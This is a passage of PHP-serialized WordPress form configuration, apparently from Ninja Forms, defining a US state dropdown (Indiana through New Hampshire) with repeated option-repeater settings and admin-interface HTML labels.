Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:14;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Indiana\";s:5:\"value\";s:2:\"IN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"14\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:15;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Iowa\";s:5:\"value\";s:2:\"IA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"15\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:16;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Kansas\";s:5:\"value\";s:2:\"KS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"16\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:17;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Kentucky\";s:5:\"value\";s:2:\"KY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"17\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:18;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Louisiana\";s:5:\"value\";s:2:\"LA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"18\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:19;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Maine\";s:5:\"value\";s:2:\"ME\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"19\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:20;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Maryland\";s:5:\"value\";s:2:\"MD\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"20\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:21;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Massachusetts\";s:5:\"value\";s:2:\"MA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"21\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:22;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Michigan\";s:5:\"value\";s:2:\"MI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"22\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:23;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Minnesota\";s:5:\"value\";s:2:\"MN\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"23\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:24;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Mississippi\";s:5:\"value\";s:2:\"MS\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"24\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:25;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Missouri\";s:5:\"value\";s:2:\"MO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"25\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:26;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Montana\";s:5:\"value\";s:2:\"MT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"26\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:27;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Nebraska\";s:5:\"value\";s:2:\"NE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"27\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:28;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Nevada\";s:5:\"value\";s:2:\"NV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"28\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:29;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"New Hampshire\";s:5:\"value\";s:2:\"NH\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:5:\"order\";s:2:\"29\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 